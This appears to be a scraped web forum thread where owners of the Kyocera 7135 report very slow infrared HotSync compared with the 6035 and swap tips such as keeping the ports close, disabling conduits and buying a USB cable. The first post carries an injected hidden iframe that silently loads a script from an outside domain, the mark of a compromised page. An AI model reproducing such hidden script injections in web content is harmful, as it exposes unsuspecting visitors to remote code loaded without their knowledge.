+ Reply to Thread
Page 1 of 2 1 2 LastLast

IR sync is much slower than 6035?

Has anyone noticed this? More importantly, has anyone fixep it?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The IRDA functionality and speeed is the same from what I have seen and experienced. I IR sync on the road to avoid brining a cradle, and noticed no time difference. However, I don't think the power is as great as the 6035, so distance may effect your speed.

Are their any PC or 7135 setting that will affect the IR sync rate?

Seems slower to me too. The IRDA port is much smaller, but even placing the 7135 very close to the emitter on my PC doesn't seem to help much.

Administrator
    be sure and keep the ports line of sight and relatively close. thats about the best you can do. the smaller port makes line of sight much more important.

I have greatly improved the speed of my IRDA sync by doing the following:

Turning my IRDA dongle horizontal

Moving it to .5 in from the 7135 IR emitter.

Mod-Blog's SmartPhone Correspondent
    Keep in mind though that you are dealing with a much larger ROM and twice as much RAM in the Kyo7135 versus the Kyo6035. Even accounting for all other factors, that might well explain much of the apparent "slowdown" we are seeing.

Slow IR Port

I left my cradle at work and had to synch with my laptop using the IR port. It took about an hour! It takes about 2 - 3 minutes with the cradle. Anybody else have this problem?

GWW

I haven't tried an IR sync, but printing via IR is much slower than my old 6035. I'm using a SiPix printer with PalmPrint. The PalmPrint developer says they are aware of something involving the newer versions of Palm OS that may be causing the slowdown, but as of last week, there was no solution.

I've also found it *incredibly* slow to sync by IR. I don't remember it being that slow on my Palm m505, but it's been a while since I did that. Anyone try speeding this up with Afterburner / what were your results?

IR Sync Speed Up

Speed up your IR sync by changing your HotSync settings. Click the HotSync icon in your system tray, select "Custom", then change everything you can spare to "do nothing". If you only sync the applications that you absolutely need to update (Calender, for example), things will click along much faster. Save your full-meal syncs for a crade connection!

7135 IR Hot Sync (SLOW)???

Is anyone else experiencing a slower IR hot sync with the 7135 (compared to the 6035)?

Thank you.
    Drew
    The one who dies with the most toys WINS :-)

Re: 7135 IR Hot Sync (SLOW)???

Originally posted by skicheer12
    Is anyone else experiencing a slower IR hot sync with the 7135 (compared to the 6035)?

Thank you.
    Drew
    Yes, interminable actually!

Let me ask the question another way... is anybody not experiencing a slower IR hotsync with the 7135?

I always synced my 6035 to my laptop via IR for everything other than a complete restore, but I find that the 7135 takes 10 minutes or more to do an IR sync that it can do in 30 seconds via USB.

Can anyone else report their experiences?

Thanks,

--Mike

Ten minutes? Took me an hour or more. There are more posts on this, but you can't search for "IR" - it takes three characters to search.

GWW

It was so painfully slow for me I splurged on the USB sync cable. Intellisync isn't exactly the fastest sync product, and the IR on the 7135 seems significantly slower than on the 6035...

This may be related to a change Palm made in their IR component when they moved to OS 4. I've been talking to tech support of several printer and software companies regarding slow printing on a SiPix A6 printer with Palm Print software. The printer works fine or even faster than before with SiPix's own software, which has been modified for OS4. Palm Print, however, says they have been unable to work around the OS4 changes.

I too noticed IR sync is orders of magnitude slower than that of the 6035. I have given up on a fix and don't use it.

Originally posted by dgelfuso
    I too noticed IR sync is orders of magnitude slower than that of the 6035. I have given up on a fix and don't use it.
    Same for all Palm devices based on my experience. *shrug* I only use it for emergencies.

Originally posted by gww2
    Ten minutes? Took me an hour or more. There are more posts on this, but you can't search for "IR" - it takes three characters to search.

GWW

fyi: you can search on 2 characters if you use as asterisk as a wildcard like: IR*
    iPhone therefore iAm.

This is nuts - I've been syncing for an hour... - Gotta get a cable I guess.
    The one who dies with the most toys WINS :-)